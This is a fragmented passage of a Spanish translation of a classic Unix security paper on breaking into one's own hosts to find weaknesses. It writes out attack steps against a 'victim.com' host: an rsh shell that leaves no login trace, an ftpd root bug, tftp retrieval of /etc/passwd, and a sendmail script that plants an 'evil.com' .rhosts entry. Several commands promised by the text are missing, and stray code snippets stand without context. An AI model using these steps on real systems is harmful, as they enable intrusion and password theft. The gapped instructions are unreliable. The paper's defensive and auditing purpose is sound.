archivo de password local. Como usuario "guest" puedes colocar una ".rhosts
entry" en el guest home directory remoto, que te permitira acceder a dicha
maquina sin tener que dar ningun password.
Unas pocas notas sobre el metodo usado arriba; "rsh victim.com csh -i" se
usa para inicialmente entrar en el sistema ya que no deja ningun rastro en
los ficheros wtmp o utmp, haciendo el comando rsh invisible para el finger
y el who. El shell remoto no esta unido a un pseudo-terminal, asi que los
prgramas tipo pagers y editores fallaran - pero es de gran utilidad para
una breve exploracion.
---
Examinando ftp, puedes probar un viejo bug que en su dia fue bastamente
explotado:
% ftp -n
ftp> open victim.com
Connected to victim.com
220 victim.com FTP server ready.
ftp> quote user ftp
331 Guest login ok, send ident as password.
ftp> quote cwd ~root
530 Please login with USER and PASS.
ftp> quote pass ftp
230 Guest login ok, access restrictions apply.
ftp> ls -al / (o lo que sea)
Si esto funciona, estaras dentro como root, y con capacidad para modificar
el fichero passwd, o lo que desees. Si tu sistema tiene este bug, tienes
que conseguir un update de tu ftpd daemon, ya sea de tu vendedor o por ftp
anonimo en ftp.uu.net.
evil % tftp
tftp> connect victim.com
tftp> get /etc/passwd /tmp/passwd.victim
tftp> quit
-----
En este caso, puedes ver varios datos significativos sobre nuestra victima;
el primero de los cuales es que es un servidor NIS. Puede que no sea muy
sabido, pero una vez que se conoce el nombre de dominio NIS de un servidor,
puedes tener cualquiera de sus mapas NIS con una simple orden rpc, incluso
cuando estas fuera de la subred del servidor NIS (por ejemplo, usando el
programa YPX que se puede encontrar en los archivos comp.sources.misc en
ftp.uu.net). Adicionalmente, tanto como los facilmente adivinables
passwords, muchos sistemas usan nombres de dominio NIS facilmente
adivinables. Tratar de adivinar el nombre de dominio NIS es normalmente
provechoso/fructifero. Los mayores candidatos son los nombres del host en
forma parcial y total (e.g. "victim" and "victim.com", el nombre de la
organización, nombres del grupo dados por el comando "showmount", y demas.
Si quisieras probar si el nombre de dominio fuera "victim", teclearias:
Como se ve este fue un intento sin éxito; si huiera sido correcto "victim",
nos habria dado un mensaje con el nombre de host del servidor NIS. De todas
formas, fijaros de la seccion NFS que victim.com esta exportando el
directorio "/var" al mundo. Todo lo que se necesita es montar dicho
directorio y mirar en el subdirectorio "yp" - entre otras cosas veras otro
subdirectorio que contiene el nombre de dominio de la victima.
-----
Puedes observar que la respuesta dada por el comando rpcinfo mostraba que
victim.com usaba rexd. Como el rsh daemon, rexd procesa peticiones del tipo
"por favor ejecuta este comando como ese usuario (como siendo ese
usuario)". A diferencia de rshd, rexd no tiene en cuenta si el host cliente
esta o no en los archivos hosts.equiv o .rhost. Normalmente el programa
rexd cliente es el comando "on", pero tan solo es necesario un pequeño
programa en C para mandar informacion arbitraria sobre el host y userid
cliente al servidor rexd; rexd ejecutara tan contento el comando. Por estas
razones, ejecutar rexd es similar a no tener passwords: toda la seguridad
esta en el cliente, no en el servidor que es donde deberia. La seguridad
del rexd puede ser mejorada de alguna manera usando un RPC seguro.
-----
char *server;
struct bp_whoami_arg arg; /* query */
struct bp_whoami_res res; /* reply */
/* initializations omitted... */
-----
Los NIS masters controlan los alias del mail para el dominio NIS en
cuestion. Como en los ficheros de alias de mail locales, puedes crear un
mail alias que ejecutara comandos cuando el mail le es mandado(un ejemplo
popular de esto es el alias "decode" que "uudecodea" archivos mail que le
son mandados). Por ejemplo, aquí creas un alias "foo", que mailea el
fichero password de vuelta a evil.com simplemente maileandole cualquier
mensaje:
Por suerte los atacantes no tendran control de tu NIS master host, pero mas
aun laa leccion esta clara - NIS normalmente no es seguro, pero si un
atacante se hace con el control de tu NIS master, efectivamente tendra de
los hosts clientes(por ejemplo podra ejecutar comandos arbitarrios).
-----
char *hostname;
if (XOpenDisplay(hostname) == NULL) {
printf("Cannot open display: %s\n", hostname);
} else {
printf("Can open display: %s\n", hostname);
}
Los terminales X, aunque mucho menos potentes que un sistema UNIX completo,
pueden tener sus propios problemas de seguridad. Muchos terminales X
permiten accesos rsh no restringidos, permitiendote iniciar programas
clientes X en el terminal de la victima apareciendo los resultados en tu
propia pantalla:
Hay dos bugs muy conocidos que deben ser tratados. El primero fue
definitivamente arreglado en la version 5.59 de Berkeley; a pesar de los
mensajes de abajo, para versiones de sendmail previas a la 5.59, "evil.com"
se añade, a pesar de los mensajes de error, junto con los tipicos headers
del mail, al archivo especificado:
% cat evil_sendmail
telnet victim.com 25 << EOSM
rcpt to: /home/zen/.rhosts
mail from: zen
data
random garbage
.
rcpt to: /home/zen/.rhosts
mail from: zen
data
evil.com
.
quit
EOSM
Confianza
Casi todos estos dependen de la conversion del IP del cliente al nombre del
host para determinar si se concede el servicio o no. El metodo mas simple
usa el archivo /etc/hosts para una busqueda directa. Sin embargo, hoy en
dia la mayoria de hosts usan o bien DNS (Domain Name Service), NIS, o ambos
para el servicio de busqueda del nombre. Una busqueda inversa ocurre cuando
un servidor tiene una direccion IP (de una conexión de un cliente) y desea
coger el correspondiente nombre del host del cliente.
y lo cambias por:
Dos metodos puedem ser usados para prevenir dichos ataques. El primero es
el mas directo, pero quizas mas poco practico. Si tu site no usa ningun
metodo de confianza, no seras tan vulnerable al engaño de host. La otra
estrategia es la de usar protocolos encriptados. El usar el seguro
protocolo RPC (usado en NFS, NIS+, seguros) es un metodo; aunque ha sido
"roto" criptograficamente, aun da mas seguridad que los procedimientos de
autentificacion RPC que no usan ningun tipo de metodo de encriptacion.
Otras soluciones, tanto de hardware (smartcards) como de software
(Kerberos), estan siendo desarroladas, pero estan o bien incompletas o
requieren cambios en el software de el sistema.
Protegiendo el sistema
"Fortifica" y protege los servidores (ej, los hosts que dan un servicio
a otros hosts - NFS, NIS, DNS, o lo que sea.). Solo permite cuentas
administrativas en dichos hosts.
Instala todos los parches de seguridad tan pronto como sea posible, en
todos tus hosts. Examina la informacion de los parches de seguridad de
otras distribuciones - muchos bugs (rdist, sendmail) son comunes en
muchas variantes UNIX.
Conclusiones
Tal vez ninguno de los metodos expuestos aquí sean sorprendentes; cuando se
escribio este documento, no aprendimos mucho sobre como irrumpir en
sistemas. Lo que aprendimos fue, testeando estos metodos en nuestros
propios sistemas y en sites amigos, lo efectivos que son estos metodos a la
hora de ganar acceso a un tipico host Unix de Internet. Cansado de tratar
de teclear todo esto a mano, y deseando mantener nuestros propios sistemas
mas seguros, decidimos poner en practica una herramienta de seguridad
(SATAN) que trata de chequear hosts remotos al menos para alguno de los
problemas discutidos aquí. La tipica respuesta, cuando informabamos a la
gente acerca de nuestro documento y nuestra herramienta, era algo del
estilo de "eso suena bastante peligroso - espero que no vayas a darlo a
todo cristo. Pero ya que tu confias en mi, podria tener una copia?"
-----
Apendice A:
Apendice B
Aunque fue muy dificil el verificar cuantas de las entradas fueron validas,
con nombres de host tales como "Makefile", "Message-Id:", and
"^Cs^A^C^M^Ci^C^MpNu^L^Z^O", asi como unas pocas entradas de wildcard, nos
cuestionamos la sensatez de poner la seguridad de un site en manos de sus
usuarios. Muchos usuarios (especialmente los poseedores de largos archivos
.rhosts) intentaron poner comentarios tipo shell en sus archivos .rhosts,
que son intentados reolver como nombre de host validos por muchos sistemas
UNIX. Desafortunadamente, un atacante puede entonces usar las tecnicas DNS
y NIS de engaño del nombre de host discutidas antes para fijar sus nombres
de host como "#" y entrar libremente. Esto pone en riesgo a muchos sites
(al menos una distribucion es dada con comentarios en sus archivos
/etc/hosts.equiv).
-----
Apendice C:
Despues de recibir mail de un site que habia sido violado desde uno de
nuestros sistemas, se inicio una investigacion. Con el tiempo, encontramos
que el intruso estaba haciendolo desde una lista de sites ".com"
(comerciales), buscando hosts con ficheros de password faciles de robar. En
este caso, "facil de robar" se refiere a sites con un nobre de dominio NIS
facil de adivinar y un servidor NIS de facil acceso. Sin saber cuan lejos
habia llegado el intruso, parecia una buena idea el alertar a los sites que
eran en si vulnerables al robo de passwords. De los 656 hosts de la lista
del intruso, 24 tenian archivos de password susceptibles de robo - 1 de
cada 25 hosts mas o menos!!. Un tercio de estos archivos contenia al menos
una cuenta sin password con shell interactivo. Con un total de 1594
entradas, a una media de 10 minutos corriendo un password cracker (Crack)
daria mas de 50 passwords, usando una estacion de trabajo Sun de gama baja.
Otros 40 mas se encontaron en los siguientes 20 minutos; y un password de
la cuenta root se encontro en solo 1 hora. El resultado despues de unos
dias de crackeo fue: 5 passwords root, 19 de 24 archivos de password (80%)
con al menos un password conocido, y 259 de 1594 (1 sexto) passwords
adivinados.
-----
Apendice D:
Listas de mail:
subscribe firewalls
Software gratis:
Sources for ftpd and many other network utilities can be found in
ftp.uu.net, in packages/bsd-sources.
Source for ISS (Internet Security Scanner), a tool that remotely scans
for various network vulnerabilities, is available via anonymous ftp from
ftp.uu.net, in usenet/comp.sources.misc/volume40/iss.
-----
Bibliografia:
Bellovin, Steve, Using the Domain Name System for System Break-ins,
1992 (unpublished).